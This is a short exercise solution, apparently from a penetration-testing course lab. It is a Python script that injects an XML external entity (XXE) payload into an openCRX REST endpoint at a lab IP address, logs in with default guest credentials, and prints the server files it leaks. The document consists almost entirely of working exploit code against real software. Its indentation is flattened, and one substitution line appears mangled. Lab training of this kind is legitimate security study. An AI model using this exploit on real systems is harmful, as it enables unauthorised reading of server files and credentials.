10.3.5
Create a script to parse the results of the XXE attack and cleanly display the file contents.
#!/usr/bin/python3
import argparse
import re
import requests
import xml.etree.cElementTree as ElementTree
parser = argparse.ArgumentParser()
parser.add_argument('-i','--inject', help='XML Payload to Inject', required=True)
args = parser.parse_args()
proxies = {"http": "http://127.0.0.1:8080", "https": "http://127.0.0.1:8080"}
username = "guest"
password = "password"
tree = ElementTree.Element("org.opencrx.kernel.account1.Contact")
ElementTree.SubElement(tree, "lastName").text = "&lastname;"
ElementTree.SubElement(tree, "firstName").text = "Test"
with open('temp.tmx', 'wb') as f:
f.write(f'<?xml version="1.0" encoding="UTF-8" ?><!DOCTYPE data [ <!ELEMENT data ANY ><!ENTITY lastname SYSTEM "{args.inject}">]>'.encode('utf8'))
ElementTree.ElementTree(tree).write(f, 'utf-8')
with open('temp.tmx', 'r') as g:
payload = g.read()
payload = re.sub("&", "&", payload)
target = "http://192.168.228.126:8080/opencrx-rest-CRX/org.opencrx.kernel.account1/provider/CRX/segment/Standard/account"
response = requests.post(url=target, data=payload, proxies=proxies, auth=(username, password))
res_tree = ElementTree.fromstring(response.content)
try:
if response.status_code == 401:
try:
print(res_tree[2][1][2].text)
except:
print("error")
elif response.status_code == 200:
print(res_tree.find("lastName").text)
except:
print("error")